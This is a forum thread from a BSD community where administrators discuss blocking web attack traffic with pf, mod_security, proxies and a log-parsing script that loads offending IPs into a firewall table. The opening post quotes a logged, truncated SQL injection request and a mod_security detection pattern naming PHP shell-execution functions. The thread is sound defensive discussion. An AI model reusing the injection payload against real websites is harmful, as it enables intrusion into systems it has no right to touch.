DaemonForums  
#1 - 18th August 2008
hunteronline (Fdisk Soldier; Join Date: Jul 2008; Posts: 52)

Generic PHP Exploit

Dropping net garbage with pf.conf. I can't find a way of blocking/dropping "PHP Exploit" attempts with a basic pf.conf rule. Can anyone point me in the right direction on this?

Thanks

The following is from a mod_security log file:

Request: www.mysite.com 68.97.80.139 - - [18/Aug/2008:14:22:56 +0000] "GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x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xEC(@S); HTTP/1.1" 403 303 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" - "-"
----------------------------------------
GET /node/8230?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x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xEC(@S); HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-us
Connection: Keep-Alive
Host: www.mysite.com
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "(chr|fwrite|fopen|system|e?chr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\\(.*\\)\\;" at THE_REQUEST [id "330001"] [rev "1"] [msg "Generic PHP exploit pattern denied"] [severity "CRITICAL"]

HTTP/1.1 403 Forbidden
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--da174d4f--
#2 - 18th August 2008
arch (Port Guard; Join Date: Jun 2008; Posts: 38)

proxy maybe?
#3 - 18th August 2008
chris (Port Guard; Join Date: May 2008; Location: United Kingdom; Posts: 35)

Isn't mod_security doing the blocking for you?
#4 - 18th August 2008
hunteronline (Fdisk Soldier; Join Date: Jul 2008; Posts: 52)

Yes, mod_security is blocking the "PHP Exploit" attempts from getting to the targeted apps, but I want to drop the exploit attempts at the firewall before they can even try to "drop their load".
#5 - 18th August 2008
crayoxide (Fdisk Soldier; Join Date: May 2008; Posts: 46)

Quote:
Originally Posted by hunteronline
I want to drop the exploit attempts at the firewall before they can even try to "drop their load".
PF does not do application-level filtering, which is why you cannot find anything on the subject. You will need to redirect through a proxy in order to get that type of filtering going on.
#6 - 18th August 2008
hunteronline (Fdisk Soldier; Join Date: Jul 2008; Posts: 52)

I'm reading the Squid documentation right now.

Thanks
#7 - 19th August 2008
schrodinger (Fdisk Soldier; Join Date: May 2008; Location: Ireland; Posts: 69)

Could you not parse log files for the offending IP addresses and add them into a table within pf? Or can mod_security write out to a file accessible by pf and add the entries in that into a blacklisted table?
#8 - 19th August 2008
hamba (Fdisk Soldier; Join Date: Apr 2008; Posts: 71)

Hi,

I guess you could try something like this:

Code:
# Pull every line carrying a dotted-quad out of the audit log, keep the 4th
# space-separated field (the client IP on the modsec2 "A" section line),
# de-duplicate, and feed the list into the pf table "apache" via stdin.
grep -E '(^|[[:space:]])[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*([[:space:]]|$)' \
    /var/log/httpd-modsec2_audit.log | cut -d ' ' -f 4 | sort -u | \
    pfctl -t apache -T add -f -
Depending on the output from your mod_security logfile.

Mine looks something like this:
Code:
--82093a46-A--
[17/Aug/2007:11:16:52 +0200] psbA9goAZJYAAU6-qfoAAACR 66.249.73.38 41056 10.0.100.150 80
--82093a46-B--
GET / HTTP/1.1
Host: www.example.net
Connection: Keep-alive
User-Agent: Mediapartners-Google
Accept-Encoding: gzip

--82093a46-F--
HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.3
Last-Modified: Fri, 10 Aug 2007 09:16:52 GMT
Cache-Control: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

--82093a46-H--
Message: Warning. Match of "rx OPTIONS" against "REQUEST_METHOD" required. [id "960015"] [msg "Request Missing an Accept Header"] [severity "CRITICAL"]
Stopwatch: 1187342212055286 119755 (466 1039 -)
Producer: ModSecurity v2.1.1 (Apache 2.x)
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2
But then again, I haven't used mod_security in a while.
I might try it again soon.
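A script that turns schrodinger's log-parsing idea and hamba's one-liner into something that handles both mod_security log shapes shown in this thread (the 1.x "Request:" line and the 2.x audit-log "A" section). This is an added example, not code from either poster; the sample log text and the pf table name <apache> are constructed for it.

```shell
#!/bin/sh
# Added example (not from the thread): extract the client IP from both
# mod_security log formats seen above so the list can be loaded into a pf
# table. The log text below is constructed so the script runs offline.

SAMPLE_LOG='Request: www.mysite.com 68.97.80.139 - - [18/Aug/2008:14:22:56 +0000] "GET /node/8230 HTTP/1.1" 403 303 "-" "Mozilla/4.0" - "-"
--82093a46-A--
[17/Aug/2007:11:16:52 +0200] psbA9goAZJYAAU6-qfoAAACR 66.249.73.38 41056 10.0.100.150 80
--82093a46-B--
GET / HTTP/1.1
Host: www.example.net
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1'

# Read a mod_security log on stdin, print one client IP per line, de-duplicated.
# Only the fields known to hold the client address are used, so the server's
# own IP (field 6 of the "A" line) and version strings are never picked up.
extract_client_ips() {
    awk '
        # 1.x format: "Request: <vhost> <client ip> - - [date] ..."
        $1 == "Request:" { print $3; next }
        # 2.x audit log: the line after "--<id>-A--" reads
        # "[date] <unique id> <client ip> <client port> <server ip> <server port>"
        /^--[0-9a-f]+-A--$/ { in_a = 1; next }
        in_a                { print $4; in_a = 0 }
    ' | grep -E '^[0-9]{1,3}(\.[0-9]{1,3}){3}$' | sort -u
}

# Dry run over the constructed sample; the IP list is the function's output.
demo_ips() {
    printf '%s\n' "$SAMPLE_LOG" | extract_client_ips
}

# Against a real log the list goes straight into the table that pf.conf
# declares (assumed names):  table <apache> persist
#                            block in quick on $ext_if from <apache> to any
#   extract_client_ips < /var/log/httpd-modsec2_audit.log | pfctl -t apache -T add -f -
if [ "$#" -gt 0 ]; then
    extract_client_ips < "$1"
else
    demo_ips
fi
```

Run it with a log path as the only argument to print the addresses for a real file, or with no argument to see the two client IPs recovered from the sample.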
#9 - 19th August 2008
hunteronline (Fdisk Soldier; Join Date: Jul 2008; Posts: 52)

Thanks for the reply, schrodinger.

Both those suggestions will work, but I'm exploring solutions that aren't "after the fact". The other problem is that the IPs responsible for these attempts are non-hosting mainstream ISPs infected by botnets (I block/drop in quick most hosting data centers). The rules to detect this type of garbage aren't a problem, but I want the detection to be at the firewall, or as close as possible to the firewall, and so far it seems like a proxy between pf and anything else is what I may have to use.
#10 - 19th August 2008
Carpetsmoker (Real Name: Martin; Tcpdump Spy; Join Date: Apr 2008; Location: Netherlands; Posts: 2,243)

Quote:
I want the detection to be at the firewall
pf isn't aware of the application layer (i.e. HTTP, SMTP, etc.), so you can't filter traffic based on an application-level protocol.
Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Content copyright © 2007-2010, the authors
Daemon image copyright ©1988, Marshall Kirk McKusick